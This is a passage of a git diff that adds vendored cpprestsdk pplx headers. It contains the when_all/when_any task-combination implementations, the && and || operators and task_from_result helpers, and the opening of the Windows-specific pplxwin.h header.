_PTask = _Begin; _PTask != _End; ++_PTask) + { + if (_PTask->is_apartment_aware()) + { + _ReturnTask._SetAsync(); + } + + _PTask->_Then( + [_PParam, _Index](task<_ElementType> _ResultTask) { + auto _PParamCopy = _PParam; + auto _IndexCopy = _Index; + auto _Func = [_PParamCopy, _IndexCopy, &_ResultTask]() { + _PParamCopy->_M_vector._Result[_IndexCopy] = _ResultTask._GetImpl()->_GetResult(); + }; + + _WhenAllContinuationWrapper(_PParam, _Func, _ResultTask); + }, + _CancellationTokenState::_None()); + + _Index++; + } + } + + return _ReturnTask; + } + }; + + template + struct _WhenAllImpl, _Iterator> + { + static task> _Perform(const task_options& _TaskOptions, + _Iterator _Begin, + _Iterator _End) + { + _CancellationTokenState* _PTokenState = + _TaskOptions.has_cancellation_token() ? _TaskOptions.get_cancellation_token()._GetImplValue() : nullptr; + + auto _PParam = new _RunAllParam>(); + cancellation_token_source _MergedSource; + + // Step1: Create task completion event. + task_options _Options(_TaskOptions); + _Options.set_cancellation_token(_MergedSource.get_token()); + task<_Unit_type> _All_tasks_completed(_PParam->_M_completed, _Options); + // The return task must be created before step 3 to enforce inline execution. + auto _ReturnTask = _All_tasks_completed._Then( + [=](_Unit_type) -> std::vector<_ElementType> { + _ASSERTE(_PParam->_M_completeCount == _PParam->_M_numTasks); + std::vector<_ElementType> _Result; + for (size_t _I = 0; _I < _PParam->_M_numTasks; _I++) + { + const std::vector<_ElementType>& _Vec = _PParam->_M_vector[_I].Get(); + _Result.insert(_Result.end(), _Vec.begin(), _Vec.end()); + } + return _Result; + }, + nullptr); + + // Step2: Combine and check tokens, and count elements in range. + if (_PTokenState) + { + _JoinAllTokens_Add(_MergedSource, _PTokenState); + _PParam->_Resize(static_cast(std::distance(_Begin, _End))); + } + else + { + size_t _TaskNum = 0; + for (auto _PTask = _Begin; _PTask != _End; ++_PTask) + { + _TaskNum++; + _JoinAllTokens_Add(_MergedSource, _PTask->_GetImpl()->_M_pTokenState); + } + _PParam->_Resize(_TaskNum); + } + + // Step3: Check states of previous tasks. + if (_Begin == _End) + { + _PParam->_M_completed.set(_Unit_type()); + delete _PParam; + } + else + { + size_t _Index = 0; + for (auto _PTask = _Begin; _PTask != _End; ++_PTask) + { + if (_PTask->is_apartment_aware()) + { + _ReturnTask._SetAsync(); + } + + _PTask->_Then( + [_PParam, _Index](task> _ResultTask) { + auto _PParamCopy = _PParam; + auto _IndexCopy = _Index; + auto _Func = [_PParamCopy, _IndexCopy, &_ResultTask]() { + _PParamCopy->_M_vector[_IndexCopy].Set(_ResultTask._GetImpl()->_GetResult()); + }; + + _WhenAllContinuationWrapper(_PParam, _Func, _ResultTask); + }, + _CancellationTokenState::_None()); + + _Index++; + } + } + + return _ReturnTask; + } + }; + + template + struct _WhenAllImpl + { + static task _Perform(const task_options& _TaskOptions, _Iterator _Begin, _Iterator _End) + { + _CancellationTokenState* _PTokenState = + _TaskOptions.has_cancellation_token() ? _TaskOptions.get_cancellation_token()._GetImplValue() : nullptr; + + auto _PParam = new _RunAllParam<_Unit_type>(); + cancellation_token_source _MergedSource; + + // Step1: Create task completion event. + task_options _Options(_TaskOptions); + _Options.set_cancellation_token(_MergedSource.get_token()); + task<_Unit_type> _All_tasks_completed(_PParam->_M_completed, _Options); + // The return task must be created before step 3 to enforce inline execution. + auto _ReturnTask = _All_tasks_completed._Then([=](_Unit_type) {}, nullptr); + + // Step2: Combine and check tokens, and count elements in range. + if (_PTokenState) + { + _JoinAllTokens_Add(_MergedSource, _PTokenState); + _PParam->_Resize(static_cast(std::distance(_Begin, _End))); + } + else + { + size_t _TaskNum = 0; + for (auto _PTask = _Begin; _PTask != _End; ++_PTask) + { + _TaskNum++; + _JoinAllTokens_Add(_MergedSource, _PTask->_GetImpl()->_M_pTokenState); + } + _PParam->_Resize(_TaskNum); + } + + // Step3: Check states of previous tasks. + if (_Begin == _End) + { + _PParam->_M_completed.set(_Unit_type()); + delete _PParam; + } + else + { + for (auto _PTask = _Begin; _PTask != _End; ++_PTask) + { + if (_PTask->is_apartment_aware()) + { + _ReturnTask._SetAsync(); + } + + _PTask->_Then( + [_PParam](task _ResultTask) { + auto _Func = []() {}; + _WhenAllContinuationWrapper(_PParam, _Func, _ResultTask); + }, + _CancellationTokenState::_None()); + } + } + + return _ReturnTask; + } + }; + + template + task> _WhenAllVectorAndValue( + const task>& _VectorTask, const task<_ReturnType>& _ValueTask, bool _OutputVectorFirst) + { + auto _PParam = new _RunAllParam<_ReturnType>(); + cancellation_token_source _MergedSource; + + // Step1: Create task completion event. + task<_Unit_type> _All_tasks_completed(_PParam->_M_completed, _MergedSource.get_token()); + // The return task must be created before step 3 to enforce inline execution. + auto _ReturnTask = _All_tasks_completed._Then( + [=](_Unit_type) -> std::vector<_ReturnType> { + _ASSERTE(_PParam->_M_completeCount == 2); + auto _Result = _PParam->_M_vector.Get(); // copy by value + auto _mergeVal = _PParam->_M_mergeVal.Get(); + + if (_OutputVectorFirst == true) + { + _Result.push_back(_mergeVal); + } + else + { + _Result.insert(_Result.begin(), _mergeVal); + } + return _Result; + }, + nullptr); + + // Step2: Combine and check tokens. + _JoinAllTokens_Add(_MergedSource, _VectorTask._GetImpl()->_M_pTokenState); + _JoinAllTokens_Add(_MergedSource, _ValueTask._GetImpl()->_M_pTokenState); + + // Step3: Check states of previous tasks. + _PParam->_Resize(2, true); + + if (_VectorTask.is_apartment_aware() || _ValueTask.is_apartment_aware()) + { + _ReturnTask._SetAsync(); + } + _VectorTask._Then( + [_PParam](task> _ResultTask) { + auto _PParamCopy = _PParam; + auto _Func = [_PParamCopy, &_ResultTask]() { + auto _ResultLocal = _ResultTask._GetImpl()->_GetResult(); + _PParamCopy->_M_vector.Set(_ResultLocal); + }; + + _WhenAllContinuationWrapper(_PParam, _Func, _ResultTask); + }, + _CancellationTokenState::_None()); + _ValueTask._Then( + [_PParam](task<_ReturnType> _ResultTask) { + auto _PParamCopy = _PParam; + auto _Func = [_PParamCopy, &_ResultTask]() { + auto _ResultLocal = _ResultTask._GetImpl()->_GetResult(); + _PParamCopy->_M_mergeVal.Set(_ResultLocal); + }; + + _WhenAllContinuationWrapper(_PParam, _Func, _ResultTask); + }, + _CancellationTokenState::_None()); + + return _ReturnTask; + } +} // namespace details + +/// +/// Creates a task that will complete successfully when all of the tasks supplied as arguments complete +/// successfully. +/// +/// +/// The type of the input iterator. +/// +/// +/// The position of the first element in the range of elements to be combined into the resulting task. +/// +/// +/// The position of the first element beyond the range of elements to be combined into the resulting task. +/// +/// +/// A task that completes successfully when all of the input tasks have completed successfully. If the input tasks +/// are of type T, the output of this function will be a task<std::vector<T>>. If the +/// input tasks are of type void the output task will also be a task<void>. +/// +/// +/// If one of the tasks is canceled or throws an exception, the returned task will complete early, in the canceled +/// state, and the exception, if one is encountered, will be thrown if you call get() or wait() on +/// that task. +/// +/// +/**/ +template +auto when_all(_Iterator _Begin, _Iterator _End, const task_options& _TaskOptions = task_options()) + -> decltype(details::_WhenAllImpl::value_type::result_type, + _Iterator>::_Perform(_TaskOptions, _Begin, _End)) +{ + typedef typename std::iterator_traits<_Iterator>::value_type::result_type _ElementType; + return details::_WhenAllImpl<_ElementType, _Iterator>::_Perform(_TaskOptions, _Begin, _End); +} + +/// +/// Creates a task that will complete successfully when both of the tasks supplied as arguments complete +/// successfully. +/// +/// +/// The type of the returned task. +/// +/// +/// The first task to combine into the resulting task. +/// +/// +/// The second task to combine into the resulting task. +/// +/// +/// A task that completes successfully when both of the input tasks have completed successfully. If the input tasks +/// are of type T, the output of this function will be a task<std::vector<T>>. If the +/// input tasks are of type void the output task will also be a task<void>. To allow for +/// a construct of the sort taskA && taskB && taskC, which are combined in pairs, the && +/// operator produces a task<std::vector<T>> if either one or both of the tasks are of type +/// task<std::vector<T>>. +/// +/// +/// If one of the tasks is canceled or throws an exception, the returned task will complete early, in the canceled +/// state, and the exception, if one is encountered, will be thrown if you call get() or wait() on +/// that task. +/// +/// +/**/ +template +auto operator&&(const task<_ReturnType>& _Lhs, const task<_ReturnType>& _Rhs) -> decltype(when_all(&_Lhs, &_Lhs)) +{ + task<_ReturnType> _PTasks[2] = {_Lhs, _Rhs}; + return when_all(_PTasks, _PTasks + 2); +} + +/// +/// Creates a task that will complete successfully when both of the tasks supplied as arguments complete +/// successfully. +/// +/// +/// The type of the returned task. +/// +/// +/// The first task to combine into the resulting task. +/// +/// +/// The second task to combine into the resulting task. +/// +/// +/// A task that completes successfully when both of the input tasks have completed successfully. If the input tasks +/// are of type T, the output of this function will be a task<std::vector<T>>. If the +/// input tasks are of type void the output task will also be a task<void>. To allow for +/// a construct of the sort taskA && taskB && taskC, which are combined in pairs, the && +/// operator produces a task<std::vector<T>> if either one or both of the tasks are of type +/// task<std::vector<T>>. +/// +/// +/// If one of the tasks is canceled or throws an exception, the returned task will complete early, in the canceled +/// state, and the exception, if one is encountered, will be thrown if you call get() or wait() on +/// that task. +/// +/// +/**/ +template +auto operator&&(const task>& _Lhs, const task<_ReturnType>& _Rhs) + -> decltype(details::_WhenAllVectorAndValue(_Lhs, _Rhs, true)) +{ + return details::_WhenAllVectorAndValue(_Lhs, _Rhs, true); +} + +/// +/// Creates a task that will complete successfully when both of the tasks supplied as arguments complete +/// successfully. +/// +/// +/// The type of the returned task. +/// +/// +/// The first task to combine into the resulting task. +/// +/// +/// The second task to combine into the resulting task. +/// +/// +/// A task that completes successfully when both of the input tasks have completed successfully. If the input tasks +/// are of type T, the output of this function will be a task<std::vector<T>>. If the +/// input tasks are of type void the output task will also be a task<void>. To allow for +/// a construct of the sort taskA && taskB && taskC, which are combined in pairs, the && +/// operator produces a task<std::vector<T>> if either one or both of the tasks are of type +/// task<std::vector<T>>. +/// +/// +/// If one of the tasks is canceled or throws an exception, the returned task will complete early, in the canceled +/// state, and the exception, if one is encountered, will be thrown if you call get() or wait() on +/// that task. +/// +/// +/**/ +template +auto operator&&(const task<_ReturnType>& _Lhs, const task>& _Rhs) + -> decltype(details::_WhenAllVectorAndValue(_Rhs, _Lhs, false)) +{ + return details::_WhenAllVectorAndValue(_Rhs, _Lhs, false); +} + +/// +/// Creates a task that will complete successfully when both of the tasks supplied as arguments complete +/// successfully. +/// +/// +/// The type of the returned task. +/// +/// +/// The first task to combine into the resulting task. +/// +/// +/// The second task to combine into the resulting task. +/// +/// +/// A task that completes successfully when both of the input tasks have completed successfully. If the input tasks +/// are of type T, the output of this function will be a task<std::vector<T>>. If the +/// input tasks are of type void the output task will also be a task<void>. To allow for +/// a construct of the sort taskA && taskB && taskC, which are combined in pairs, the && +/// operator produces a task<std::vector<T>> if either one or both of the tasks are of type +/// task<std::vector<T>>. +/// +/// +/// If one of the tasks is canceled or throws an exception, the returned task will complete early, in the canceled +/// state, and the exception, if one is encountered, will be thrown if you call get() or wait() on +/// that task. +/// +/// +/**/ +template +auto operator&&(const task>& _Lhs, const task>& _Rhs) + -> decltype(when_all(&_Lhs, &_Lhs)) +{ + task> _PTasks[2] = {_Lhs, _Rhs}; + return when_all(_PTasks, _PTasks + 2); +} + +namespace details +{ +// Helper struct for when_any operators to know when tasks have completed +template +struct _RunAnyParam +{ + _RunAnyParam() : _M_exceptionRelatedToken(nullptr), _M_completeCount(0), _M_numTasks(0), _M_fHasExplicitToken(false) + { + } + ~_RunAnyParam() + { + if (_CancellationTokenState::_IsValid(_M_exceptionRelatedToken)) _M_exceptionRelatedToken->_Release(); + } + task_completion_event<_CompletionType> _M_Completed; + cancellation_token_source _M_cancellationSource; + _CancellationTokenState* _M_exceptionRelatedToken; + atomic_size_t _M_completeCount; + size_t _M_numTasks; + bool _M_fHasExplicitToken; +}; + +template +void _WhenAnyContinuationWrapper(_RunAnyParam<_CompletionType>* _PParam, const _Function& _Func, task<_TaskType>& _Task) +{ + bool _IsTokenCancled = !_PParam->_M_fHasExplicitToken && + _Task._GetImpl()->_M_pTokenState != _CancellationTokenState::_None() && + _Task._GetImpl()->_M_pTokenState->_IsCanceled(); + if (_Task._GetImpl()->_IsCompleted() && !_IsTokenCancled) + { + _Func(); + if (atomic_increment(_PParam->_M_completeCount) == _PParam->_M_numTasks) + { + delete _PParam; + } + } + else + { + _ASSERTE(_Task._GetImpl()->_IsCanceled() || _IsTokenCancled); + if (_Task._GetImpl()->_HasUserException() && !_IsTokenCancled) + { + if (_PParam->_M_Completed._StoreException(_Task._GetImpl()->_GetExceptionHolder())) + { + // This can only enter once. + _PParam->_M_exceptionRelatedToken = _Task._GetImpl()->_M_pTokenState; + _ASSERTE(_PParam->_M_exceptionRelatedToken); + // Deref token will be done in the _PParam destructor. + if (_PParam->_M_exceptionRelatedToken != _CancellationTokenState::_None()) + { + _PParam->_M_exceptionRelatedToken->_Reference(); + } + } + } + + if (atomic_increment(_PParam->_M_completeCount) == _PParam->_M_numTasks) + { + // If no one has be completed so far, we need to make some final cancellation decision. + if (!_PParam->_M_Completed._IsTriggered()) + { + // If we already explicit token, we can skip the token join part. + if (!_PParam->_M_fHasExplicitToken) + { + if (_PParam->_M_exceptionRelatedToken) + { + _JoinAllTokens_Add(_PParam->_M_cancellationSource, _PParam->_M_exceptionRelatedToken); + } + else + { + // If haven't captured any exception token yet, there was no exception for all those tasks, + // so just pick a random token (current one) for normal cancellation. + _JoinAllTokens_Add(_PParam->_M_cancellationSource, _Task._GetImpl()->_M_pTokenState); + } + } + // Do exception cancellation or normal cancellation based on whether it has stored exception. + _PParam->_M_Completed._Cancel(); + } + delete _PParam; + } + } +} + +template +struct _WhenAnyImpl +{ + static task> _Perform(const task_options& _TaskOptions, + _Iterator _Begin, + _Iterator _End) + { + if (_Begin == _End) + { + throw invalid_operation("when_any(begin, end) cannot be called on an empty container."); + } + _CancellationTokenState* _PTokenState = + _TaskOptions.has_cancellation_token() ? _TaskOptions.get_cancellation_token()._GetImplValue() : nullptr; + auto _PParam = new _RunAnyParam, _CancellationTokenState*>>(); + + if (_PTokenState) + { + _JoinAllTokens_Add(_PParam->_M_cancellationSource, _PTokenState); + _PParam->_M_fHasExplicitToken = true; + } + + task_options _Options(_TaskOptions); + _Options.set_cancellation_token(_PParam->_M_cancellationSource.get_token()); + task, _CancellationTokenState*>> _Any_tasks_completed( + _PParam->_M_Completed, _Options); + + // Keep a copy ref to the token source + auto _CancellationSource = _PParam->_M_cancellationSource; + + _PParam->_M_numTasks = static_cast(std::distance(_Begin, _End)); + size_t _Index = 0; + for (auto _PTask = _Begin; _PTask != _End; ++_PTask) + { + if (_PTask->is_apartment_aware()) + { + _Any_tasks_completed._SetAsync(); + } + + _PTask->_Then( + [_PParam, _Index](task<_ElementType> _ResultTask) { + auto _PParamCopy = _PParam; // Dev10 + auto _IndexCopy = _Index; // Dev10 + auto _Func = [&_ResultTask, _PParamCopy, _IndexCopy]() { + _PParamCopy->_M_Completed.set( + std::make_pair(std::make_pair(_ResultTask._GetImpl()->_GetResult(), _IndexCopy), + _ResultTask._GetImpl()->_M_pTokenState)); + }; + + _WhenAnyContinuationWrapper(_PParam, _Func, _ResultTask); + }, + _CancellationTokenState::_None()); + + _Index++; + } + + // All _Any_tasks_completed._SetAsync() must be finished before this return continuation task being created. + return _Any_tasks_completed._Then( + [=](std::pair, _CancellationTokenState*> _Result) + -> std::pair<_ElementType, size_t> { + _ASSERTE(_Result.second); + if (!_PTokenState) + { + _JoinAllTokens_Add(_CancellationSource, _Result.second); + } + return _Result.first; + }, + nullptr); + } +}; + +template +struct _WhenAnyImpl +{ + static task _Perform(const task_options& _TaskOptions, _Iterator _Begin, _Iterator _End) + { + if (_Begin == _End) + { + throw invalid_operation("when_any(begin, end) cannot be called on an empty container."); + } + + _CancellationTokenState* _PTokenState = + _TaskOptions.has_cancellation_token() ? _TaskOptions.get_cancellation_token()._GetImplValue() : nullptr; + auto _PParam = new _RunAnyParam>(); + + if (_PTokenState) + { + _JoinAllTokens_Add(_PParam->_M_cancellationSource, _PTokenState); + _PParam->_M_fHasExplicitToken = true; + } + + task_options _Options(_TaskOptions); + _Options.set_cancellation_token(_PParam->_M_cancellationSource.get_token()); + task> _Any_tasks_completed(_PParam->_M_Completed, _Options); + + // Keep a copy ref to the token source + auto _CancellationSource = _PParam->_M_cancellationSource; + + _PParam->_M_numTasks = static_cast(std::distance(_Begin, _End)); + size_t _Index = 0; + for (auto _PTask = _Begin; _PTask != _End; ++_PTask) + { + if (_PTask->is_apartment_aware()) + { + _Any_tasks_completed._SetAsync(); + } + + _PTask->_Then( + [_PParam, _Index](task _ResultTask) { + auto _PParamCopy = _PParam; // Dev10 + auto _IndexCopy = _Index; // Dev10 + auto _Func = [&_ResultTask, _PParamCopy, _IndexCopy]() { + _PParamCopy->_M_Completed.set( + std::make_pair(_IndexCopy, _ResultTask._GetImpl()->_M_pTokenState)); + }; + _WhenAnyContinuationWrapper(_PParam, _Func, _ResultTask); + }, + _CancellationTokenState::_None()); + + _Index++; + } + + // All _Any_tasks_completed._SetAsync() must be finished before this return continuation task being created. + return _Any_tasks_completed._Then( + [=](std::pair _Result) -> size_t { + _ASSERTE(_Result.second); + if (!_PTokenState) + { + _JoinAllTokens_Add(_CancellationSource, _Result.second); + } + return _Result.first; + }, + nullptr); + } +}; +} // namespace details + +/// +/// Creates a task that will complete successfully when any of the tasks supplied as arguments completes +/// successfully. +/// +/// +/// The type of the input iterator. +/// +/// +/// The position of the first element in the range of elements to be combined into the resulting task. +/// +/// +/// The position of the first element beyond the range of elements to be combined into the resulting task. +/// +/// +/// A task that completes successfully when any one of the input tasks has completed successfully. If the input +/// tasks are of type T, the output of this function will be a task<std::pair<T, +/// size_t>>>, where the first element of the pair is the result of the completing task, and the second +/// element is the index of the task that finished. If the input tasks are of type void the output is a +/// task<size_t>, where the result is the index of the completing task. +/// +/// +/**/ +template +auto when_any(_Iterator _Begin, _Iterator _End, const task_options& _TaskOptions = task_options()) + -> decltype(details::_WhenAnyImpl::value_type::result_type, + _Iterator>::_Perform(_TaskOptions, _Begin, _End)) +{ + typedef typename std::iterator_traits<_Iterator>::value_type::result_type _ElementType; + return details::_WhenAnyImpl<_ElementType, _Iterator>::_Perform(_TaskOptions, _Begin, _End); +} + +/// +/// Creates a task that will complete successfully when any of the tasks supplied as arguments completes +/// successfully. +/// +/// +/// The type of the input iterator. +/// +/// +/// The position of the first element in the range of elements to be combined into the resulting task. +/// +/// +/// The position of the first element beyond the range of elements to be combined into the resulting task. +/// +/// +/// The cancellation token which controls cancellation of the returned task. If you do not provide a cancellation +/// token, the resulting task will receive the cancellation token of the task that causes it to complete. +/// +/// +/// A task that completes successfully when any one of the input tasks has completed successfully. If the input +/// tasks are of type T, the output of this function will be a task<std::pair<T, +/// size_t>>>, where the first element of the pair is the result of the completing task, and the second +/// element is the index of the task that finished. If the input tasks are of type void the output is a +/// task<size_t>, where the result is the index of the completing task. +/// +/// +/**/ +template +auto when_any(_Iterator _Begin, _Iterator _End, cancellation_token _CancellationToken) + -> decltype(details::_WhenAnyImpl::value_type::result_type, + _Iterator>::_Perform(_CancellationToken._GetImplValue(), _Begin, _End)) +{ + typedef typename std::iterator_traits<_Iterator>::value_type::result_type _ElementType; + return details::_WhenAnyImpl<_ElementType, _Iterator>::_Perform(_CancellationToken._GetImplValue(), _Begin, _End); +} + +/// +/// Creates a task that will complete successfully when either of the tasks supplied as arguments completes +/// successfully. +/// +/// +/// The type of the returned task. +/// +/// +/// The first task to combine into the resulting task. +/// +/// +/// The second task to combine into the resulting task. +/// +/// +/// A task that completes successfully when either of the input tasks has completed successfully. If the input tasks +/// are of type T, the output of this function will be a task<std::vector<T>. If the input +/// tasks are of type void the output task will also be a task<void>. To allow for a +/// construct of the sort taskA || taskB && taskC, which are combined in pairs, with && taking +/// precedence over ||, the operator|| produces a task<std::vector<T>> if one of the tasks is of +/// type task<std::vector<T>> and the other one is of type task<T>. +/// +/// +/// If both of the tasks are canceled or throw exceptions, the returned task will complete in the canceled state, +/// and one of the exceptions, if any are encountered, will be thrown when you call get() or wait() on +/// that task. +/// +/// +/**/ +template +task<_ReturnType> operator||(const task<_ReturnType>& _Lhs, const task<_ReturnType>& _Rhs) +{ + auto _PParam = new details::_RunAnyParam>(); + + task> _Any_tasks_completed(_PParam->_M_Completed, + _PParam->_M_cancellationSource.get_token()); + // Chain the return continuation task here to ensure it will get inline execution when _M_Completed.set is called, + // So that _PParam can be used before it getting deleted. + auto _ReturnTask = _Any_tasks_completed._Then( + [=](std::pair<_ReturnType, size_t> _Ret) -> _ReturnType { + _ASSERTE(_Ret.second); + _JoinAllTokens_Add(_PParam->_M_cancellationSource, + reinterpret_cast(_Ret.second)); + return _Ret.first; + }, + nullptr); + + if (_Lhs.is_apartment_aware() || _Rhs.is_apartment_aware()) + { + _ReturnTask._SetAsync(); + } + + _PParam->_M_numTasks = 2; + auto _Continuation = [_PParam](task<_ReturnType> _ResultTask) { + // Dev10 compiler bug + auto _PParamCopy = _PParam; + auto _Func = [&_ResultTask, _PParamCopy]() { + _PParamCopy->_M_Completed.set( + std::make_pair(_ResultTask._GetImpl()->_GetResult(), + reinterpret_cast(_ResultTask._GetImpl()->_M_pTokenState))); + }; + _WhenAnyContinuationWrapper(_PParam, _Func, _ResultTask); + }; + + _Lhs._Then(_Continuation, details::_CancellationTokenState::_None()); + _Rhs._Then(_Continuation, details::_CancellationTokenState::_None()); + + return _ReturnTask; +} + +/// +/// Creates a task that will complete successfully when any of the tasks supplied as arguments completes +/// successfully. +/// +/// +/// The type of the returned task. +/// +/// +/// The first task to combine into the resulting task. +/// +/// +/// The second task to combine into the resulting task. +/// +/// +/// A task that completes successfully when either of the input tasks has completed successfully. If the input tasks +/// are of type T, the output of this function will be a task<std::vector<T>. If the input +/// tasks are of type void the output task will also be a task<void>. To allow for a +/// construct of the sort taskA || taskB && taskC, which are combined in pairs, with && taking +/// precedence over ||, the operator|| produces a task<std::vector<T>> if one of the tasks is of +/// type task<std::vector<T>> and the other one is of type task<T>. +/// +/// +/// If both of the tasks are canceled or throw exceptions, the returned task will complete in the canceled state, +/// and one of the exceptions, if any are encountered, will be thrown when you call get() or wait() on +/// that task. +/// +/// +/**/ +template +task> operator||(const task>& _Lhs, const task<_ReturnType>& _Rhs) +{ + auto _PParam = new details::_RunAnyParam, details::_CancellationTokenState*>>(); + + task, details::_CancellationTokenState*>> _Any_tasks_completed( + _PParam->_M_Completed, _PParam->_M_cancellationSource.get_token()); + + // Chain the return continuation task here to ensure it will get inline execution when _M_Completed.set is called, + // So that _PParam can be used before it getting deleted. + auto _ReturnTask = _Any_tasks_completed._Then( + [=](std::pair, details::_CancellationTokenState*> _Ret) -> std::vector<_ReturnType> { + _ASSERTE(_Ret.second); + _JoinAllTokens_Add(_PParam->_M_cancellationSource, _Ret.second); + return _Ret.first; + }, + nullptr); + + if (_Lhs.is_apartment_aware() || _Rhs.is_apartment_aware()) + { + _ReturnTask._SetAsync(); + } + + _PParam->_M_numTasks = 2; + _Lhs._Then( + [_PParam](task> _ResultTask) { + // Dev10 compiler bug + auto _PParamCopy = _PParam; + auto _Func = [&_ResultTask, _PParamCopy]() { + auto _Result = _ResultTask._GetImpl()->_GetResult(); + _PParamCopy->_M_Completed.set(std::make_pair(_Result, _ResultTask._GetImpl()->_M_pTokenState)); + }; + _WhenAnyContinuationWrapper(_PParam, _Func, _ResultTask); + }, + details::_CancellationTokenState::_None()); + + _Rhs._Then( + [_PParam](task<_ReturnType> _ResultTask) { + auto _PParamCopy = _PParam; + auto _Func = [&_ResultTask, _PParamCopy]() { + auto _Result = _ResultTask._GetImpl()->_GetResult(); + + std::vector<_ReturnType> _Vec; + _Vec.push_back(_Result); + _PParamCopy->_M_Completed.set(std::make_pair(_Vec, _ResultTask._GetImpl()->_M_pTokenState)); + }; + _WhenAnyContinuationWrapper(_PParam, _Func, _ResultTask); + }, + details::_CancellationTokenState::_None()); + + return _ReturnTask; +} + +/// +/// Creates a task that will complete successfully when any of the tasks supplied as arguments completes +/// successfully. +/// +/// +/// The type of the returned task. +/// +/// +/// The first task to combine into the resulting task. +/// +/// +/// The second task to combine into the resulting task. +/// +/// +/// A task that completes successfully when either of the input tasks has completed successfully. If the input tasks +/// are of type T, the output of this function will be a task<std::vector<T>. If the input +/// tasks are of type void the output task will also be a task<void>. To allow for a +/// construct of the sort taskA || taskB && taskC, which are combined in pairs, with && taking +/// precedence over ||, the operator|| produces a task<std::vector<T>> if one of the tasks is of +/// type task<std::vector<T>> and the other one is of type task<T>. +/// +/// +/// If both of the tasks are canceled or throw exceptions, the returned task will complete in the canceled state, +/// and one of the exceptions, if any are encountered, will be thrown when you call get() or wait() on +/// that task. +/// +/// +/**/ +template +auto operator||(const task<_ReturnType>& _Lhs, const task>& _Rhs) -> decltype(_Rhs || _Lhs) +{ + return _Rhs || _Lhs; +} + +/// +/// Creates a task that will complete successfully when any of the tasks supplied as arguments completes +/// successfully. +/// +/// +/// The type of the returned task. +/// +/// +/// The first task to combine into the resulting task. +/// +/// +/// The second task to combine into the resulting task. +/// +/// +/// A task that completes successfully when either of the input tasks has completed successfully. If the input tasks +/// are of type T, the output of this function will be a task<std::vector<T>. If the input +/// tasks are of type void the output task will also be a task<void>. To allow for a +/// construct of the sort taskA || taskB && taskC, which are combined in pairs, with && taking +/// precedence over ||, the operator|| produces a task<std::vector<T>> if one of the tasks is of +/// type task<std::vector<T>> and the other one is of type task<T>. +/// +/// +/// If both of the tasks are canceled or throw exceptions, the returned task will complete in the canceled state, +/// and one of the exceptions, if any are encountered, will be thrown when you call get() or wait() on +/// that task. +/// +/// +/**/ +template, typename _Pair = std::pair> +_Ty operator||(const task& _Lhs_arg, const task& _Rhs_arg) +{ + const _Ty& _Lhs = _Lhs_arg; + const _Ty& _Rhs = _Rhs_arg; + auto _PParam = new details::_RunAnyParam<_Pair>(); + + task> _Any_task_completed( + _PParam->_M_Completed, _PParam->_M_cancellationSource.get_token()); + // Chain the return continuation task here to ensure it will get inline execution when _M_Completed.set is called, + // So that _PParam can be used before it getting deleted. + auto _ReturnTask = _Any_task_completed._Then( + [=](_Pair _Ret) { + _ASSERTE(_Ret.second); + details::_JoinAllTokens_Add(_PParam->_M_cancellationSource, _Ret.second); + }, + nullptr); + + if (_Lhs.is_apartment_aware() || _Rhs.is_apartment_aware()) + { + _ReturnTask._SetAsync(); + } + + _PParam->_M_numTasks = 2; + auto _Continuation = [_PParam](_Ty _ResultTask) mutable { + // Dev10 compiler needs this. + auto _PParam1 = _PParam; + auto _Func = [&_ResultTask, _PParam1]() { + _PParam1->_M_Completed.set(std::make_pair(details::_Unit_type(), _ResultTask._GetImpl()->_M_pTokenState)); + }; + _WhenAnyContinuationWrapper(_PParam, _Func, _ResultTask); + }; + + _Lhs._Then(_Continuation, details::_CancellationTokenState::_None()); + _Rhs._Then(_Continuation, details::_CancellationTokenState::_None()); + + return _ReturnTask; +} + +template +task<_Ty> task_from_result(_Ty _Param, const task_options& _TaskOptions = task_options()) +{ + task_completion_event<_Ty> _Tce; + _Tce.set(_Param); + return create_task(_Tce, _TaskOptions); +} + +template +inline task<_Ty> task_from_result(const task_options& _TaskOptions = task_options()) +{ + task_completion_event<_Ty> _Tce; + _Tce.set(); + return create_task(_Tce, _TaskOptions); +} + +template +task<_TaskType> task_from_exception(_ExType _Exception, const task_options& _TaskOptions = task_options()) +{ + task_completion_event<_TaskType> _Tce; + _Tce.set_exception(_Exception); + return create_task(_Tce, _TaskOptions); +} + +} // namespace pplx + +#pragma pop_macro("new") + +#if defined(_MSC_VER) +#pragma warning(pop) +#endif +#pragma pack(pop) + +#endif // (defined(_MSC_VER) && (_MSC_VER >= 1800)) + +#ifndef _CONCRT_H +#ifndef _LWRCASE_CNCRRNCY +#define _LWRCASE_CNCRRNCY +// Note to reader: we're using lower-case namespace names everywhere, but the 'Concurrency' namespace +// is capitalized for historical reasons. The alias let's us pretend that style issue doesn't exist. +namespace Concurrency +{ +} +namespace concurrency = Concurrency; +#endif +#endif + +#endif // PPLXTASKS_H diff --git a/Src/Common/CppRestSdk/include/pplx/pplxwin.h b/Src/Common/CppRestSdk/include/pplx/pplxwin.h new file mode 100644 index 0000000..7cbbb78 --- /dev/null +++ b/Src/Common/CppRestSdk/include/pplx/pplxwin.h @@ -0,0 +1,268 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Windows specific pplx implementations + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ + +#pragma once + +#if !defined(_WIN32) || _MSC_VER < 1800 || CPPREST_FORCE_PPLX + +#include "Common/CppRestSdk/include/cpprest/details/cpprest_compat.h" +#include "Common/CppRestSdk/include/pplx/pplxinterface.h" + +namespace pplx +{ +namespace details +{ +namespace platform +{ +/// +/// Returns a unique identifier for the execution thread where this routine in invoked +/// +_PPLXIMP long __cdecl GetCurrentThreadId(); + +/// +/// Yields the execution of the current execution thread - typically when spin-waiting +/// +_PPLXIMP void __cdecl YieldExecution(); + +/// +/// Captures the callstack +/// +__declspec(noinline) _PPLXIMP size_t __cdecl CaptureCallstack(void**, size_t, size_t); + +#if defined(__cplusplus_winrt) +/// +// Internal API which retrieves the next async id. +/// +_PPLXIMP unsigned int __cdecl GetNextAsyncId(); +#endif +} // namespace platform + +/// +/// Manual reset event +/// +class event_impl +{ +public: + static const unsigned int 